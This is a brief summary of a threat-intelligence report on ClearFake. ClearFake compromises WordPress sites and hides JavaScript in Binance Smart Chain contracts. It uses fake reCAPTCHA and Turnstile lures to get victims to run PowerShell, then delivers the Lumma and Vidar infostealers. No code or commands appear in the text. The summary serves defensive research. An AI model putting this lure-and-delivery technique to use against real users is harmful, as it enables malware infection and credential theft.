ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery

ClearFake is a malicious JavaScript framework that compromises websites (primarily WordPress) to perform drive-by downloads using Web3-based "EtherHiding" on the Binance Smart Chain. The framework fetches compressed/encoded JavaScript and AES-encrypted lure pages from smart contracts, presents social-engineering lures (fake reCAPTCHA / Cloudflare Turnstile) to trick users into executing PowerShell commands, and ultimately delivers loaders (Emmenhtal) and infostealers (Lumma, Vidar). The report provides detailed technical analysis, IoCs (wallet addresses, smart contract ABIs, lure and payload URLs, PowerShell commands), and scripts to parse and decrypt the malicious artifacts.